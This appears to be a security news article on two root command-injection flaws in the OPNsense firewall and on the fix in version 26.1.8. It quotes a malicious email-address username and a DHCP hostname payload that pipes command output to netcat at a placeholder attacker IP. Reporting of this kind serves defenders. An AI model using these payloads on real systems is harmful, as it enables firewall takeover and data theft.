OPNsense Critical Root RCE (CVE-2026-44194 & CVE-2026-45158) Details and PoC Disclosed

The open-source firewall community is on high alert today after critical security vulnerabilities in OPNsense were dragged into the light. The full technical details and proof-of-concept (PoC) exploit code for two severe flaws have been publicly disclosed.

The first flaw, tracked as CVE-2026-44194, is a surgical strike against the OPNsense user management system. Researchers discovered that while the firewall’s web interface performs validation, it explicitly allows valid email addresses to be used as usernames.

The “local-part” of an email address—the section before the @ symbol—can legally be wrapped in quotes. Inside these quotes, shell metacharacters are considered valid email characters. By crafting a malicious email address like “id>/conf/proof.txt”@example.com, an attacker with user-management privileges can bypass input validation entirely.

When the system attempts to sync this user, it passes the username directly into a shell command. The shell interprets the metacharacters, resulting in arbitrary command execution as root.

The second vulnerability, tracked as CVE-2026-45158, is even more pervasive, targeting the way OPNsense handles DHCP configurations on system interfaces.

A user with “page-interfaces” privileges can enable DHCP on an interface and set a custom hostname. This hostname is later written into a configuration file (dhclient.conf) without being sanitized.

The critical breakdown occurs when the system processes this configuration through a shell script. An attacker can provide a hostname embedded with commands—such as test”; media “aa; id | nc <attacker-ip> <port>”; }/. When the DHCP client runs or restarts, it executes the injected code, granting the attacker a remote root shell.

The impact of these disclosures cannot be overstated. Because the injected commands execute as root, a successful attacker can achieve total system compromise, essentially taking over the entire firewall.

The public availability of the PoC code means that even low-skilled actors can now weaponize these flaws against unpatched systems.

OPNsense has moved swiftly to address these flaws.

• Affected Versions: All versions up to and including 26.1.7 are vulnerable.
• The Fix: Administrators must update to OPNsense 26.1.8 immediately.